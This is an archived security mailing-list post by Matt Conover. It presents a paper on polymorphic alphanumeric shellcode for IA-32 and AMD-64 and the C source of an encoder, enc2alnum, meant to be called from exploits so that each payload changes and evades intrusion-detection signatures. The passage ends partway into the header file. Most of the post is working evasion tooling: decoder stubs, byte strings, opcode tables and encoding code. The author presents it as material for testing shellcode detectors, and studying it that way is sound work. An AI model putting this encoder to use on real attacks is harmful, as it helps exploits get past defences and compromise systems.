| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY10-F8PD7Fjm0fwYd0000634c@hotmail.com>
From: mconover_001 at hotmail.com (m conover)
Subject: RE: On Polymorphic Evasion (attached inline this time)
=== Addendum
Thanks for pointing out the attachment was stripped. I'll include it below.
Grep "===" for each file. Sorry about the wrapping and that stuff, if u want
a zip/tgz of it then just email me.
It is meant to be used in API fashion from an exploit to modify the
shellcode each time it is run. Entry point is char *Encode2Alnum(input_reg,
OriginalShellcode, OriginalShellcodeLength, int Verbose) and it will return
a alphanumerized morphed version of the original shellcode. If you call it
repeatedly you'll see the actual payload will fully change each time but the
stub less so.. it does change all variable parts, but there are parts of the
decoder that are fixed (e.g., the longest string is "A3A7A2B70B7B"). The
solution is to add variable size alphanumeric NOPs as discussed in
polymorph_alnum.txt below, but this step was never implemented.
It its current form it will only work on Windows but of course it is trivial
to change it to work on Unix if u remove windows.h and add typedefs for
DWORD/BYTE/etc
=== Original post
Cool. I will also add to the discussion with an alphanumeric version written
with two others for experimentation, though it is limited in it doesn't vary
the length of the decoder stubs or encoded shellcode. spoonm is doing a
separate version--I think based on Berend's alpha--that will. Also, I did
not test it against any of the different shellcode detectors like Fnord, so
I would be curious to know if anyone tries. IMO "as to whether the detection
of polymorphic shellcode was indeed an appropriate component of an IDS", I
think there is enough prior art on it that it's not really a big deal to
publish or discuss code implementing it. It most likely better to have a
variety of generators to test the effectiveness of a shellcode detector. I
added a small blurb on addtional options for OS-independence with
alphanumeric shellcode for IA-32e/AMD-64 since it adds the new RIP-relative
addressing.
=== enc2alnum/polymorph_alnum.txt
Applying Polymorphism to Alphanumeric IA-32/IA-32e/AMD-64 Shellcode
Matt Conover
Rix (rix 2001) should be credited with being the pioneer of IA32
alphanumeric shellcode and showing it is possible. His Phrack article was
the first to demonstrate feasibility. What rix did could be more called a
translator than an encoder. There was no fixed payload followed by a blob of
encoded shellcode that needed to be decoded. In shellcode terms this was
quite innovative but really blew up the shellcode size.
The next major step occurred when someone--unfortunately I don't know
who--came up with a decoder that would modify the last byte of the decoder
using an XOR to create a JNZ instruction and do looped decoding. This was to
my knowledge the first compact alphanumeric encoder to follow rix's original
translator. Both this decoder and Berend-Jan Wever's alpha decoder (Wever
2004) are based on this technique. This makes the shellcode much more
compact as well. The size of the encoded output shellcode is: EncoderSize +
sizeof(OriginalShellcode) * 2. Thus, it roughly doubled the shellcode
size--a vast improvement over the first generation. The main limitation is
that it was stack overflow specific. It was assuming that the shellcode was
called immediate following a ret (and thus [esp-4] contains the shellcodes
address).
Berend-Jan Wever earlier this year released an alphanumeric decoder which is
now also being used in the metasploit framework. In my opinion, the main
contribution of his encoder was the creation of an alphanumeric
Windows-specific GetPC stub. It is using an XOR trick like the one
demonstrated by Costin Ionescu (Ionescu 2003). Since that time he has made
some other major contributions, primarily combining his alphanumeric decode
with a Unicode decoder, thus creating the first alphanumeric Unicode decoder
that I Know of
The approach we took was entirely using stubs. The assumption was that in
almost all exploitation cases, it would be possible to reference the decoder
relative to a register. We created a stub to represent all registers, direct
or indirect, with positive or negative offsets. For example, take the case
of EAX. We have a stub for each of these cases:
EAX
EAX+offset
EAX-offset
[EAX]
[EAX+offset]
[EAX-offset]
This is represented as:
{ EAX,
EAXStub,
PreEAXPositiveOffsetStub, INC_ECX, PostEAXPositiveOffsetStub,
PreEAXNegativeOffsetStub, DEC_EAX, PostEAXNegativeOffsetStub,
EAXIndirectStub,
PreEAXIndirectPositiveOffsetStub, INC_ECX,
PostEAXIndirectPositiveOffsetStub,
PreEAXIndirectNegativeOffsetStub, DEC_EAX,
PostEAXIndirectNegativeOffsetStub
},
The structure to represent each register is:
typedef struct _REG_STUB
{
BYTE RegType;
BYTE *DirectStub;
BYTE *PreDirectPositiveOffsetStub;
BYTE DirectPositiveOffsetOpcode;
BYTE *PostDirectPositiveOffsetStub;
BYTE *PreDirectNegativeOffsetStub;
BYTE DirectNegativeOffsetOpcode;
BYTE *PostDirectNegativeOffsetStub;
BYTE *IndirectStub;
BYTE *PreIndirectPositiveOffsetStub;
BYTE IndirectPositiveOffsetOpcode;
BYTE *PostIndirectPositiveOffsetStub;
BYTE *PreIndirectNegativeOffsetStub;
BYTE IndirectNegativeOffsetOpcode;
BYTE *PostIndirectNegativeOffsetStub;
} REG_STUB;
These are the stubs for eax:
BYTE EAXStub[] = "P"; // push eax
BYTE EAXIndirectStub[] = "Ph!!!!X*****P*a30VX5!!!!P";
BYTE PreEAXPositiveOffsetStub[] = "PY"; // inc eax is not possible, so do
push eax; pop ecx
BYTE PostEAXPositiveOffsetStub[] = "Q"; // do push ecx
BYTE PreEAXNegativeOffsetStub[] = "";
BYTE PostEAXNegativeOffsetStub[] = "P";
BYTE PreEAXIndirectPositiveOffsetStub[] = "PY"; // inc eax is not possible,
so do push eax; pop ecx
BYTE PostEAXIndirectPositiveOffsetStub[] = "Qh!!!!X*****P*a30VX5!!!!P"; //
do same as ecx case
BYTE PreEAXIndirectNegativeOffsetStub[] = "";
BYTE PostEAXIndirectNegativeOffsetStub[] = "Ph!!!!X*****P*a30VX5!!!!P";
Note: the remainder of the stubs is in the appendix
The only limitation here is that offset needs to be smaller than 60 or so to
stay within the alphanumeric range. We then applied this to all registers
(eax, ebx, ecx, edx, esi, edi, ebp, esp). So the only time this technique
will not work is if the address of the decoder can not be described in terms
of a register, or worse, it is unpredictable.
In the case that it is difficult to predict or describe the location of the
decoder relative to a register, a GetPC trick is necessary. There is one
major problem, though: there is no known generic OS-independent GetPC. On
Windows this could be done using the SEH ovewrite trick, which Berend-Jan
Wever's alpha encoder was doing. The biggest problem is that it is costly in
terms of size. The only alphanumeric opcodes to write an arbitrary address
into an arbitrary address (e.g., like the 4-byte overwrites used in heap
exploits) involves the following steps:
1. Initializing a register to 0
2. XOR'ing it with some 32-bit alphanumeric address (A1).
3. XOR'ing it again with some other 32-bit alphanumeric address (A2) such
that A1 XOR A2 = WhereToWrite address
4. Repeating this process to get the WhatToWrite address
5. Clear out the contents at address [WhereToWrite] by doing do write memory
type XORs
6. Set the contents of at address [WhereToWrite] = WhatToWrite using another
XOR
This is obviously a lot of work to get the decoder address and it doesn't
work on anything other than Windows.
+++ THE MERGING OF ALPHANUMERIC AND POLYMORPHIC ENCODING
Since writing alphanumeric decoders by hand is tedious, the same encoder is
likely going to be reused repeatedly. Consider these string from Berend-Jan
Wever's alpha encoder:
w32_SEH_GetPC_mixed_code:
VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089
alpha_decoder_main_code1:
VTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOM
alpha_decoder_main_code2:
VTX630VX4A0B4HH0B10BAVX2BBBH4A2AB0ABTBBQB0ABAVX4Z8BBJOM
Now if you were to look at metasploit 2.0 framework developed by HD Moore
and spoonm, you would find the following:
VTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0ADTBDQB0ADAVX4Z8BDJOM
The similarity between the two different is quite obvious. The reason? It
takes time to write a good encoder, debug it, etc. Once a functional encoder
is developed, it is unlikely to change much... even as it is passed among
different shellcode writers. The likelihood of someone modifying the encoder
is obviously inversely proportional to the complexity of the encoder.
Therein lies the greatest weakness. Alphanumeric shellcode is afforded one
primary advantage, however: the instruction set is difficult to distinguish
from benign network traffic. Consider how difficult a task it is for a NIDS
to recognize alphanumeric shellcode within the contents of a MIME via email
or HTTP. It would be much too expensive to actually decode all the MIME
traffic and then validate the decoded data is meaningful. Thus, a NIDS will
rely on covering all known variants of the encoder.
There are basically only three steps left in the evolution of alphanumeric
shellcode on IA32 that I can see:
1. Combing alphanumeric encoders with other restricted encoders
Here I mean making Unicode alphanumeric shellcode encoder, an alphanumeric
shellcode that resembles sentences, etc.
Berend-Jan Wever has already made many combinatinos of Unicode/alphanumeric
encoders and is well on his way with the second, so I believe this step will
soon be completed for the majority of useful cases.
2. An OS-independent GetPC trick
This is one of the two fundamental problems of alphanumeric shellcode
encoders. I do not believe anyone will ever discover an OS-independent GetPC
trick for pure IA32. There are some new possibilities with the upcoming
IA-32 with 64-bit extensions that will be discussed later.
3. Becoming polymorphic
This is the other fundamental problem of alphanumeric shellcode encoders.
First, the encoder cannot be fixed because this is easy to detect. Second,
an input payload must result in a different encoded payload each time.
Addressing these problems is the primary aim of this paper.
+++ Making the encoder polymorphic
Since alphanumeric shellcode can already masquerade well with mediums such
as web traffic and email, the only real thing that needs to be addressed is
to reduce the fixed part of the encoder to a size that is so small that it
infeasible to use signature reliably. This was done in two steps. First, I
added a pseudo-language to represent wildcard characters:
RANDOMIZER g_Randomizers[] =
{
{ '*', 0, FALSE, INDIRECT_CHARSET },
{ '!', 3, TRUE, INDIRECT_CHARSET },
{ 0, 0, FALSE, NULL }
};
Here are a few examples. First the decoder itself:
BYTE g_Decoder[] = "Zh!!!!X5!!!!H4C0B6RYkA7@...7A2B70B7Bh!!!!X5!!!!4_8A7ub";
Second, a sample stub:
BYTE EAXIndirectStub[] = "Ph!!!!X*****P*a30VX5!!!!P";
This is the structure:
typedef struct _RANDOMIZER
{
BYTE RandomizeKey;
DWORD Extra;
BOOL ReplaceNextMatch;
BYTE *CharacterSet;
} RANDOMIZER;
Here, the first field (RandomizeKey) is the special character and the last
entry (CharacterSet) indicates the character set to replace the special
character with. The middle two entries are bit more difficult to explain.
The second field (Extra) indicates the subsequent bytes (excluding the
matched RandomizeKey) that are included. This is used to randomize them in
groups. The ReplaceNextMatch is used to replace the next occurence of the
RandomizeKey with the same values. This is needed for XOR keys. Thus:
push !!!!
pop eax
xor eax, !!!!
Means that both !!!! will have the same value but that each individual '!'
will have a different value.
+++ Making randomized encodings
As with cryptography, it is ideal to have ensure there is little visible
correlation between input and output. First, encoding the same thing twice
should look no similar than two different inputs. Second, repeating
sequences should not be visibile in the output. Thus if the input shellcode
had a NOP slide, this should appear no different than the rest of encoded
shellcode.
Similar to base64, converting from an input base of 8 bits (0x00-0xFF) to an
output base of 6 bits (A-Za-z0-9) takes two bytes.
The first step is to pick an XOR key that can be used to encode every
possible input key. Next, find the number of ways to do encoding. Consider
what the decoder does:
DecodedByte = EncodedByte[0] * Key;
DecodedByte ^= EncodedByte[1];
So it is a matter of solving the reverse equation:
for (EncodedByte1 = '0'; EncodedByte1 <= 'z'; EncodedByte1++)
{
for (EncodedByte2 = '0'; EncodedByte2 <= 'z'; EncodedByte2++)
OriginalByte2 = EncodedByte1 * Key;
OriginalByte2 ^= EncodedByte2;
if (OriginalByte == OriginalByte2) matched++;
}
EncodingCounts[OriginalByte] = matched;
That is how the map is created. Then during the encoding, everytime the
input byte is encountered, a random value less than the total number of
possible encoding is chosen and that is used to select the encoding bytes.
Thus, a sequence of "AAAAAA" would produce entirely differently characters
for each 'A' (assuming there was more than one encoding). It would not be
possible to recognize repeating patterns such as NOP slides from the output,
for example.
The final decoder looks like this:
/*
// edx points the beginning of the shellcode payload
(stubs+decoder+shellcode)
Z 01: pop edx
// set eax to 0xffffffff
h!!!! 02: push XORA
X 03: pop eax
5!!!! 04: xor eax,XORA
H 05: dec eax
// change line 22 to jnz
4C 06: xor al,43h
0B6 07: xor byte ptr [edx+36h],al
// set ecx to point to shellcode
R 08: push edx
Y 09: pop ecx
kA7@ 10: imul eax,dword ptr [ecx+37h],KEY
A 11: inc ecx
3A7 12: xor eax,dword ptr [ecx+37h]
A 13: inc ecx
2B7 14: xor al,byte ptr [edx+37h]
0B7 15: xor byte ptr [edx+37h],al
B 16: inc edx
h!!!! 17: push XORB
X 18: pop eax
5!!!! 19: xor eax,XORB
4_ 20: xor al,TERMINATOR
8A7 21: cmp byte ptr [ecx+37h],al
ub 22: jnz _OriginalShellcode+5Eh // changed by lines 4 and 5
_ = terminator
@ = key
!!!! = XOR_VALUES
*/
Each stub is responsible for getting the address of the shellcode onto the
stack. The first instruction of the decoder is to pop the address of the
shellcode and then begin operating on it.
+++ Adding NOPs
Admittedly, this is still not good enough. There is still a fairly long and
distinct string in the encoder:
H4C0B6RYkA7@...7A2B70B7Bh
The solution here is to add random alphanumeric NOPs of varying length at
random offsets in the encoder. The only generic IA-32 alphanumeric NOPs
involve PUSH, POP, INC, and DEC (alphanumeric XOR requires a memory
address):
1. push reg_a; pop reg_a
2. inc reg_a; dec reg_a;
3. push reg_a
push reg_b
pop reg_a
pop reg_b
push reg_a
push reg_b
pop reg_a
pop reg_b
4. #3 but with an INC before the first set of PUSH instructions and DEC
after the last set of POP instructions
5. #4 but with DEC/INC reversed
+++ POSSIBILITIES WITH IA-32E AND OS-INDEPENDENT ALPHANUMERIC SHELLCODE
AMD-64 and Intel's IA-32 with 64-bit extensions (hereafter referred to as
IA-32e) adds 64-bit support to the IA-32 architecture. It is the same as
IA-32 with a few additional opcodes, a new opcode prefix (called REX),
additional 64-bit registers (RAX, RBX, RCX, RIP, RSI, RDI, etc.), and the
ability to reference 64-bit addresses (using the REX prefix). Some opcodes
implicitly use 64-bit addresses and by default the operand size is the same
as IA-32. This makes it possible for most IA32 code to run without any
problems.
The 64-bit mode (also known as "long mode") is enabled from 32-bit protected
mode by:
1. Enabling page address extensions (setting the PAE bit in CR4)
2. Setting CR3 to point to a page table with 64-bit page table entries
(which must reside with the 4GB of memory)
3. Setting the LME bit in the EFER MSR (MSR 0xc0000080)
There are two important operating modes. One is compability mode, where the
processor works just like IA-32--so there is no reason to discuss this mode
further. The newer mode is the 64-bit mode that enables the 64-bit address
space. To be placed into 64-bit mode, the following steps msut be taken.
Now, so far what I've said has little effect on writing shellcode. There is
one MAJOR change, however: the creation of the RIP (64-bit instruction
pointer) relative addressing mode. RIP-relative offsets (hereafter called
RIP offset) are just like branch instructions. It is relative to the next
instruction in memory. Thus [RIP+0] references the opcode of the next
instruction.
For non-alphanumeric shellcode, this is only a minor improvement. It
eliminates the need to use a "call 0; pop reg" type tricks frees up a
register. For alphanumeric shellcode this solves the bigger problem of
having no OS-independent GetPC ONLY IF it is not a string operation being
exploited. By this I mean, it needs to be possible to have more than one NUL
byte occur in the shellcode. If this is not possible, then the RIP-relative
addressing mode will probably not help much. More on this later.
The REX prefix is a new opcode prefix which must come after any legacy IA-32
opcode prefixes. It is used to add various 64-bit extensions:
[0] REX.B = adds 1-bit to base in (1) ModRM.rm, (2) SIB.base, and (3)
opcode.reg for register opcodes with no ModRM byte
[1] REX.X = adds 1-bit to SIB.index
[2] REX.W = 64-bit operands
[3] REX.R = adds 1 bit to ModRM.reg
[4-7] Must be 0100 (4)
The REX prefixes can thus range from 0x40-0x4f. All but one of them (0x40)
is alphanumeric: 0x41 = 'A', ..., 0x4F = 'O'. The possible alphanumeric REX
bytes are:
REX.W = 01001xxx = 0x48-0x4f = H to O
REX.R = 0100x1xx = 0x44-0x47, 0x4c-0x4f = D to G, L to O
REX.X = 0100xx1x = 0x42, 0x43, 0x46, 0x47, 0x4a, 0x4b, 0x4e, 0x4f = B, C,
F, G, J, K, N, O
REX.B = 0100xxx1 = 0x41, 0x43, 0x45, 0x47, 0x49, 0x4b, 0x4d, 0x4f = A, C,
E, G, I, K, M, O
+++ The magic '5'
The ModRM byte is broken into three fields: [mod = high 2 bits][reg = 3
bits][rm = low 3 bits]
In IA-32 (or IA-32e in compatibility mod), ModRM.mod = 00 and ModRM.rm =
101 indicates the DS:Disp32 addressing mode. That means it is a 32-bit
offset relative to address 0 in the data segment. For all x86 32-bit
operating systems that I'm aware, the address space is flat, so this
represents an absolute address.
In IA-32e in 64-bit mode, DS:Disp32 has been replaced by RIP-relative
addressing. Thus the only ModRM byte possibilities for RIP-relative
addressing are 00reg101. There is just ONE alphanumeric character in this
range: the magic 5. ASCII '5' = 0x35 = 00110101
Note that REX.R and REX.B have no physical affect on the ModRM byte since
the additional bit is in the REX prefix
Thus, '5' is always the only alphanumeric ModRM byte possible, regardless
of the REX prefix (if any)
So the ModRM byte is immediately followed by a 32-bit displacement:
"<prefix bytes><opcode>5<AABBCCDD>"
Here opcode is an opcode type that is followed by a ModRM byte (not all do),
'5' is the ModRM byte, and AABBCCDD is the 32-bit displacement (which should
be all alphanumeric of course).
Now we've reached the most appropriate time to discuss the problem with
using RIP offsets for alphanumeric shellcode that I alluded to earlier. The
only addressing mode that is relative to the instruction pointer uses 32-bit
displacements. The limitation this causes greatly varies depending on
whether or not it is possible to send multiple NUL bytes.
For shellcode through strings (only a terminating NUL byte allowed):
The RIP offset will be between 0x30303030-0x7a7a7a7a since the offset must
not contain NULs (or else the string will be terminated) and
non-alphanumeric characters. The question then is whether or not this
provides any advantage over using the existing possibilities. So far as I
can tell, the answer is no. To make use of such large offsets you have know
the approximate location of the shellcode. If you already have this
information available, you can just reference the location by absolute
address through a register and XOR.
For shellcode with multiple NUL bytes allowed:
If the instruction set is alphanumeric characters plus an arbitrary number
of NUL bytes, then RIP offsets can make things really interesting. It is
then possible to construct useful RIP offsets.
To do looping, the use of a conditional jump is necessary to decode all the
encoded shellcode. This is done through self-modification. To do
self-modification, the decoder previously needed to know its own address.
When NUL bytes are allowed, this can be done cleanly with RIP offsets. The
only instruction available to arbitrarily modify memory is XOR. These are
the formats of XOR available:
XOR [RIP+AABBCCDD], al 00110000 00110101 DDBBCCAA = "05DDBBCCAA"
XOR [RIP+AABBCCDD], eax 00110001 00110101 DDBBCCAA = "15DDBBCCAA"
XOR al,[RIP+AABBCCDD] 00110010 00110101 DDBBCCAA = "25DDBBCCAA"
XOR eax, [RIP+AABBCCDD] 00110011 00110101 DDBBCCAA = "35DDBBCCAA"
^- opcode ^- ModRM ^- 32-bit displacement
Note: the 32-bit displacement is written backwards in memory because IA32 is
a little endian architecture
So now lets look at what the encoder was previously doing to create the JNZ:
// edx points the beginning of the shellcode payload
(stubs+decoder+shellcode)
Z 01: pop edx
// set eax to 0xffffffff
h!!!! push XORA
X pop eax
5!!!! xor eax,XORA
H dec eax
// change line 22 to jnz
4C xor al,43h
0B6 xor byte ptr [edx+36h],al
So the shellcode stubs were responsible for pushing the address of the
decoder onto the stack. Once the address of the decoder is known, offset
0x36 of the decoder is set to JNZ. Using the new RIP relative addressing,
the decoder can be changed to:
// pop edx is no longer needed
// set eax to 0xffffffff
h!!!! push XORA
X pop eax
5!!!! xor eax,XORA
H dec eax
// change line 22 to jnz
4C xor al,43h
056\0\0\0 xor byte ptr [RIP+36h],al
Since it is no larger necessary to determine the address of the shellcode,
the stubs can be removed and anything referencing [edx+off] in the decoder
will be changed to [RIP+off]. It will make the shellcode larger since all
RIP offsets are 32-bit displacements, but it will make the shellcode
OS-independent.
+++ New IA-32e NOPs
1. For certain types of instructions the REX prefix is ignored. For these
cases, 0x41-0x4f can be used as NOPs. Some common shellcode cases are: POP
reg, POP mem, PUSH imm8, PUSH imm32, PUSH reg, PUSH mem, PUSH reg, RET,
CALL, JMP, Jcc (conditional jumps), LOOP, and LOOPcc.
When using the REX prefix as a NOP for alphanumeric shellcode, the PUSH,
POP, and Jcc instructions are usable. This was well covered in rix's paper.
2. Using the operand size prefix (0x66) with REX.W set (0x48, 0x49, 0x4a,
0x4b, 0x4c, 0x4d, 0x4e, 0x4f)
3. The actual value of the REX prefix byte can be varied without changing
the meaning for certain instructions. I'll call these REX NOPs.
REX.R is ignored when (1) there is no ModRM byte (2) ModRM.reg does not
specify a general purpose, XMM, control, or debug register. Note that for
alphanumeric shellcode, only instructions involving a general purpose
register are relevant.
REX.X are ignored when there is SIB byte
REX.B is ignored when there is no ModRM or SIB byte
4. Though it has no application to alphanumeric shellcode, some segment
override prefixes are ignored in 64-bit mode: 0x26, 0x2E, 0x36, 0x3E
(segment overrides for ES, CS, SS and DS, respectively)
Here is the alphanumeric instruction set that can utilize the REX prefix
(0x41-0x4f) as a NOP, sorted alphabetically:
JA disp8 = "w<disp8>" (any REX prefix)
JAE disp8 = "s<disp8>" (any REX prefix)
JB disp8 = "r<disp8>" (any REX prefix)
JBE disp8 = "v<disp8>" (any REX prefix)
JNZ disp8 = "u<disp8>" (any REX prefix)
JNO disp8 = "q<disp8>" (any REX prefix)
JNS disp8 = "y<disp8>" (any REX prefix)
JO disp8 = "p<disp8>" (any REX prefix)
JPE disp8 = "z<disp8>" (any REX prefix)
JS disp8 = "x<disp8>" (any REX prefix)
JZ disp8 = "t<disp8>" (any REX prefix)
POP eax = "X" (REX.W and REX.R should not be set)
POP ecx = "Y" (REX.W and REX.R should not be set)
POP edx = "Z" (REX.W and REX.R should not be set)
PUSH imm8 = "j<imm8>" (any REX prefix)
PUSH imm32 = "h<imm32>"
PUSH eax = "P"
PUSH ebx = "S"
PUSH ecx = "Q"
PUSH edx = "R"
PUSH esi = "V"
PUSH edi = "W"
PUSH ebp = "U"
PUSH esp = "T"
Note that for imm8, imm32, disp8, and disp32 all bytes need to be
alphanumeric. The imm32 and disp32 are stored with the least signature byte
first ("<bits0_7><bits8_15><bits16_23><bits24_31>").
When inserting a REX NOP in front of a particular instruction, the engine
should:
1. First, never generate REX prefixes of 0x41-0x47 ('A' to 'G'). This will
make cause problems in most cases.
2. Restrict the possible REX values depending on the instruction type.
3. Adjust the offsets in relative branch instructions. To account for the
inserted REX NOPs. If the offset is negative, decrement the offset by the
number of REX NOPs inserted before that location. If the offset is positive,
increment the offset by the number of REX NOPs inserted after that location.
+++ ACKNOWLEDGEMENTS
Greets always to gera, oded, and noir. Kudos to rix, Berend-Jan Wever,
spoonm, CLET, and the others that have/are raising the bar for alphanumeric
decoders.
+++ WORKS CITED
CLET Team. Aug. 2003. Polymorphic Shellcode Engine. Phrack
<http://www.phrack.org/show.php?p=61&a=9>.
Ionescu, Costin. 1 July 2003. Re: GetPC code (was: Shellcode from ASCII).
Vuln-Dev <http://www.securityfocus.com/archive/82/327348>
rix. Aug. 2001. Writing ia32 alphanumeric shellcodes. Phrack
<http://www.phrack.org/show.php?p=57&a=15>.
Wever, Berend-Jan. 28 Jan. 2001. Alphanumeric GetPC code. Vuln-Dev
<http://www.securityfocus.com/archive/82/351528>.
=== enc2alnum/enc2alnum.c
// Encode2Alnum (polymorphic alphanumeric decoder/encoder)
// Copyright (C) 2003-2004, Matt Conover, Avri Schneider and Soren Macbeth
#include "enc2alnum.h"
#define ENC2ALNUM_COPYRIGHT "enc2alnum: Copyright (C) 2003-2004,\nMatt
Conover, Avri Schneider, Soren Macbeth\n\n"
int reg_type; // eax, ebx, etc
int reg_indirect; // if set to 1, use [reg]; else use reg
int reg_offset; // if reg_negative is set, use reg-offset; else use
reg+offset
int reg_negative;
void Encode2AlnumUsage()
{
fprintf(stderr, ENC2ALNUM_COPYRIGHT);
fprintf(stderr, "ERROR in Encode2Alnum (invalid input_reg)\n\n");
fprintf(stderr, "input_reg must be one of the following:\n");
fprintf(stderr, " reg = the register points to the shellcode\n");
fprintf(stderr, "\tSupported registers are eax, ebx, ecx, edx, esi, edi,
ebp, esp\n");
fprintf(stderr, " [reg] = reg points to a pointer to the shellcode\n");
fprintf(stderr, "\tSupported registers are the same as above\n");
fprintf(stderr, " reg+X\n");
fprintf(stderr, " reg-x\n");
fprintf(stderr, " [reg+X]\n");
fprintf(stderr, " [reg-x]\n\n\n");
fprintf(stderr, "\tenc2alnum [eax]\n");
fprintf(stderr, "Example - Assumes ecx-8 is the shellcode address:\n");
fprintf(stderr, "\tenc2alnum ecx-8\n");
}
BOOL ParseShellcodeLocation(char *reg_input)
{
char *end_ptr, *orig_source, *source;
#ifndef TESTING
int i;
BYTE a;
#endif
if (!reg_input) return FALSE;
orig_source = source = strdup(reg_input);
if (source[0] == '[')
{
source++;
reg_indirect = 1;
}
if (toupper(source[0]) != 'E') goto abort;
source++;
source[0] = toupper(source[0]);
source[1] = toupper(source[1]);
if (strncmp(source, "AX", 2) == 0) reg_type = EAX;
else if (strncmp(source, "BX", 2) == 0) reg_type = EBX;
else if (strncmp(source, "CX", 2) == 0) reg_type = ECX;
else if (strncmp(source, "DX", 2) == 0) reg_type = EDX;
else if (strncmp(source, "SI", 2) == 0) reg_type = ESI;
else if (strncmp(source, "DI", 2) == 0) reg_type = EDI;
else if (strncmp(source, "SP", 2) == 0) reg_type = ESP;
else if (strncmp(source, "BP", 2) == 0) reg_type = EBP;
else goto abort;
source += 2;
if ((reg_indirect && *source == ']') || (!reg_indirect && !*source)) goto
finished;
if (*source == '-') reg_negative = 1;
else if (*source == '+') reg_negative = 0;
else goto abort;
source++;
for (end_ptr = source; *end_ptr && isdigit(*end_ptr); end_ptr++);
if (reg_indirect && *end_ptr != ']') goto abort;
else if (!reg_indirect && *end_ptr) goto abort;
*end_ptr = '\0';
reg_offset = atoi(source);
finished:
free(orig_source);
return TRUE;
abort:
if (orig_source) free(orig_source);
Encode2AlnumUsage();
return FALSE;
}
void UpdateOffsets(BYTE *Decoder, DWORD StubLength)
{
BYTE OffsetA = JNZ_VALUEA + (BYTE)StubLength;
BYTE OffsetB = JNZ_VALUEB + (BYTE)StubLength;
Decoder[JNZ_OFFSETA] = OffsetA;
Decoder[JNZ_OFFSETB_1] = OffsetB;
Decoder[JNZ_OFFSETB_2] = OffsetB;
Decoder[JNZ_OFFSETB_3] = OffsetB;
Decoder[JNZ_OFFSETB_4] = OffsetB;
Decoder[JNZ_OFFSETB_5] = OffsetB;
}
// For format of input_reg, see Encode2AlnumUsage
// NOTE: the caller must free the return value
BYTE *Encode2Alnum(char *input_reg, BYTE *OriginalShellcode, DWORD
OriginalShellcodeLength, BOOL Verbose)
{
DWORD StubLength, DecoderLength;
DWORD i, j, index = 0;
BYTE EncodedByte[2];
BYTE *InStub = NULL;
BOOL BadKey = TRUE;
BYTE *EncodedShellcode;
DWORD EncodedShellcodeLength;
#ifdef TESTING
BYTE OriginalByte;
BYTE *DecodedShellcode;
DWORD DecodedShellcodeLength;
#endif
if (!ParseShellcodeLocation(input_reg)) return NULL;
srand(GetTickCount());
StubLength = GetStubLength();
DecoderLength = strlen(g_Decoder);
EncodedShellcodeLength = StubLength + DecoderLength +
(OriginalShellcodeLength)*2 + 1;
EncodedShellcode = malloc(EncodedShellcodeLength+1);
if (!EncodedShellcode)
{
printf("Error allocating %d bytes\n", EncodedShellcodeLength+1);
return NULL;
}
while (BadKey)
{
memset(EncodedShellcode, 0, EncodedShellcodeLength+1);
if (StubLength > 0 && !CopyStub(EncodedShellcode, StubLength)) return
NULL;
if (!RandomizeDecoder(g_Decoder, DecoderLength)) return NULL;
UpdateOffsets(g_Decoder, StubLength); // TODO: remove
// Copy decoder after stub
memcpy(EncodedShellcode+StubLength, g_Decoder, DecoderLength);
// Check stub and decoder
for (i = 0; EncodedShellcode[i]; i++)
{
if (!isalnum(EncodedShellcode[i]))
{
fprintf(stderr, "ERROR: offset %d of stub+decoder != alphanumeric\n",
i);
assert(0);
return NULL;
}
}
memset(EncodingCounts, 0, 256);
for (i = 0; i < 256; i++) ComputeEncodingCount((BYTE)i);
index = strlen(EncodedShellcode);
EncodedByte[0] = EncodedByte[1] = 0;
for (i = 0, j = 0, BadKey = FALSE; i < OriginalShellcodeLength; i++, j +=
2)
{
#ifdef TESTING
OriginalByte = OriginalShellcode[i];
#endif
if (!EncodeTo2Bytes(OriginalShellcode[i], EncodedByte))
{
BadKey = TRUE;
break;
}
assert(isalnum(EncodedByte[0]) && isalnum(EncodedByte[1]));
EncodedShellcode[index+j] = EncodedByte[0];
EncodedShellcode[index+j+1] = EncodedByte[1];
#ifdef TESTING
assert(DecodeToByte(EncodedByte) == OriginalByte);
#endif
}
// If BadKey was not reset it will fall out of the loop
}
EncodedShellcode[index+j] = Terminator;
assert(index+j+1 == EncodedShellcodeLength);
if (Verbose)
{
printf("BYTE EncodedShellcode[] = // encoded %d bytes\n\t\"",
EncodedShellcode, OriginalShellcodeLength);
for (i = 0; i < EncodedShellcodeLength; i++)
{
printf("%c", (BYTE)EncodedShellcode[i]);
if (!((i + 1) % 64)) printf("\"\n\t\"");
}
printf("\";\n\n");
}
#ifndef TESTING
// Check stub+decoder+encodedshellcode
for (i = 0; EncodedShellcode[i]; i++)
{
if (!isalnum(EncodedShellcode[i]))
{
fprintf(stderr, "ERROR: EncodedShellcode[%d] = 0x%02x (not
alphanumeric)\n", i, EncodedShellcode[i]);
assert(0);
return NULL;
}
}
assert(i == EncodedShellcodeLength);
#endif
#ifdef TESTING
TestStubs(EncodedShellcode);
DecodedShellcodeLength = EncodedShellcodeLength - DecoderLength;
DecodedShellcodeLength /= 2;
if (Verbose) printf("\nDecoded %d bytes to %d bytes\n",
EncodedShellcodeLength, DecodedShellcodeLength);
assert(OriginalShellcodeLength == DecodedShellcodeLength);
DecodedShellcode = (BYTE *)malloc(DecodedShellcodeLength+1);
if (!DecodedShellcode)
{
printf("Failed to allocate %d bytes\n", DecodedShellcodeLength+1);
return -1;
}
memset(DecodedShellcode, 0, DecodedShellcodeLength+1);
memcpy(DecodedShellcode, EncodedShellcode+DecoderLength,
DecodedShellcodeLength);
if (Verbose)
{
printf("BYTE DecodedShellcode[%d] =\n\t\"", DecodedShellcodeLength);
for (i = 0; i < DecodedShellcodeLength; i++)
{
printf("\\x%02x", (BYTE)DecodedShellcode[i]);
if (!((i + 1) % 16)) printf("\"\n\t\"");
}
printf("\";\n");
}
assert(DecodedShellcodeLength == OriginalShellcodeLength);
assert(memcmp(DecodedShellcode, OriginalShellcode, OriginalShellcodeLength)
== 0);
free(DecodedShellcode);
#endif
return EncodedShellcode;
}
=== enc2alnum/enc2alnum.h
// Encode2Alnum (polymorphic alphanumeric decoder/encoder)
